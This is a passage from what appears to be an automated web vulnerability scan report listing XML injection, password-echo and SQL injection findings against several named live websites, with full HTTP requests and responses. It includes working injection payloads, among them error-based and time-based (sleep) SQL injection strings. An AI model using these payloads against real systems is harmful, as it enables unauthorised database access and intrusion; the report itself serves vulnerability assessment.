Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX019F6A6F02$C4$BE201000$E1$27$E96je$9D$0Dje$9D$0Dje$9D$0D10001000$1E810$2302!50$15$8F$C0$5F$7F$89$E8YI$81$FD$1E!e02000`minfo=v.5,EX01D09384A2$FC$24$DD$0C$97$2Eksn5$25$0Fa$E0$60$95n$17$DAJ$33G$F3$B8$FBQJ$A2$13$D1$7C$1B1$D7s$DC$E8$197i$36bt7$B7Z$3D$AD0$5B151`269; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX016096FF65$FC$24$DD$0C$8A$2Ekcn5$2D2a$EE$60$95u$17$D4J$31G$F3$B6$E4QJ$A7$13$D1O$1B1`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`180; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.21. https://www.expedia.com/pub/agent.dll [s_vi cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The s_vi cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s_vi cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]]]>>; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:41 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01CCFAC15C$0D$BB201000$DB$27$E96$22b$9D$0D$22b$9D$0D$22b$9D$0D10001000$1E810$2302!50$14$1D$E9$AB$246I$CD$5F$C4$D0N!e02000`minfo=v.5,EX0121F88C0E$FB$24$DD$0C$C03$DBZz9I$A1p$99U$2B8$D87$113$DBU$30$60$98o$E1$F1zq$B3$DE$EA$C43$1F$2B$DB$3EQ$A0$9CEf$C41$DB`264; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01682CB3E9$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D85$110$DAU$2C$60$99o$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.22. https://www.expedia.com/pub/agent.dll [srvys cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The srvys cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the srvys cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0]]>>; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:14 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01A7FF4251$A1$BA201000$D8$27$E96$BEb$9D$0D$BEb$9D$0D$BEb$9D$0D10001000$1E810$2302!50$B2$F3$15$CA$F6$8C$8B$D4T$3A$8E$A3!e02000`minfo=v.5,EX013B7E42AA$FB$24$DD$0C$C03$DBZz9I$A1p$99$40$298$D8$0C$11$0B$DCU$30$60$98o$E1$F1zq$B3$DE$EA$C23$18$2B$D1$3EQ$A0$9CEf$C41$DB`274; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01328D33C9$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D81$112$D1U$24$60$9Eo$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.23. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The h parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the h parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/05/02/0511_f_larry_whiteside_fp_2_163095_163098.jpg&h=244]]>>&w=436&c=1 HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%255D%7C1461848369310%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271303995569312%2527%255D%255D%7C1461848369312%3B; __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1; ASP.NET_SessionId=zpaunnv34zkpdxy4mysuxdoz

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 06 May 2011 22:51:48 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:51:48 GMT
Content-Length: 41087

......JFIF..............Adobe.d........BExif..MM.*.........................................................................    .....................................................(...........1..........
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
9.24. http://www.scmagazineus.com/webservice/ImageResizer.ashx [w parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The w parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the w parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/05/02/0511_f_larry_whiteside_fp_2_163095_163098.jpg&h=244&w=436]]>>&c=1 HTTP/1.1
Host: www.scmagazineus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527referrers%2527%252C%25271303995569311%2527%255D%255D%7C1461848369310%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271303995569312%2527%255D%255D%7C1461848369312%3B; __utmz=53791274.1303995582.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=53791274.422456328.1303995582.1303995582.1303995582.1; ASP.NET_SessionId=zpaunnv34zkpdxy4mysuxdoz

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/Jpeg
Expires: Fri, 06 May 2011 22:52:32 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
From: Web2-VM
Date: Fri, 06 May 2011 21:52:31 GMT
Content-Length: 41087

......JFIF..............Adobe.d........BExif..MM.*.........................................................................    .....................................................(...........1..........
...[SNIP]...
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
10. Password returned in later response  previous  next
There are 2 instances of this issue:

Issue description

Passwords submitted to the application are returned in clear form in later responses from the application. This behaviour increases the risk that users' passwords will be captured by an attacker. Many types of vulnerability, such as weaknesses in session handling, broken access controls, and cross-site scripting, would enable an attacker to leverage this behaviour to retrieve the passwords of other application users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire application.

Issue remediation

There is usually no good reason for an application to return users' passwords in its responses. This behaviour should be removed from the application.

10.1. http://www.socialfollow.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /

Request 1

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.2.10.1304721456

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:38:43 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=383d3a7937f2f4fbb471661631d341dd; expires=Fri, 06 May 2011 19:38:43 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">
...[SNIP]...
<input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
...[SNIP]...
<label for="tPassword">Password:</label>
...[SNIP]...
<input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" />
...[SNIP]...
<label for="tRePassword">Password (retype):</label>
...[SNIP]...
<input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" />
...[SNIP]...
field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");</script>
...[SNIP]...
10.2. http://www.socialfollow.com/blog/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /blog/

Request 1

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email&pPassword=Password

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=71434cdaab7d48ca4d16e33577c1485b; expires=Fri, 06 May 2011 19:37:53 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4494
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

Request 2

GET /blog/ HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.3.10.1304721456

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:39:52 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.socialfollow.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=f9e5973c7ff9e78b9f821853443b2eb5; expires=Fri, 06 May 2011 19:39:55 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 96431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">
...[SNIP]...
<input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" />
...[SNIP]...
11. SQL statement in request parameter  previous  next
There are 12 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

11.1. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Request

GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:43:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 130
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
Duplicate entry '_!@4dilemma:0' for key 1
11.2. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/Exec_Reset.asp

Request

POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate
Content-Length: 204

username=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&existingPassword=3&newPassword=3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 172
Content-Type: text/html
Location: index.asp?message=Invalid%20Username%20/%20Password
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:31:20 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="index.asp?message=Invalid%20Username%20/%20Password">here</a>.</body>
11.3. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Request

GET /AccountManager/ResetPassword/index.asp?message=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=MBNPJKACNAJKJFBPLELMNGGF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3689
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:20:59 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
11.4. http://login.vindicosuite.com/default.asp  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://login.vindicosuite.com
Path:   /default.asp

Request

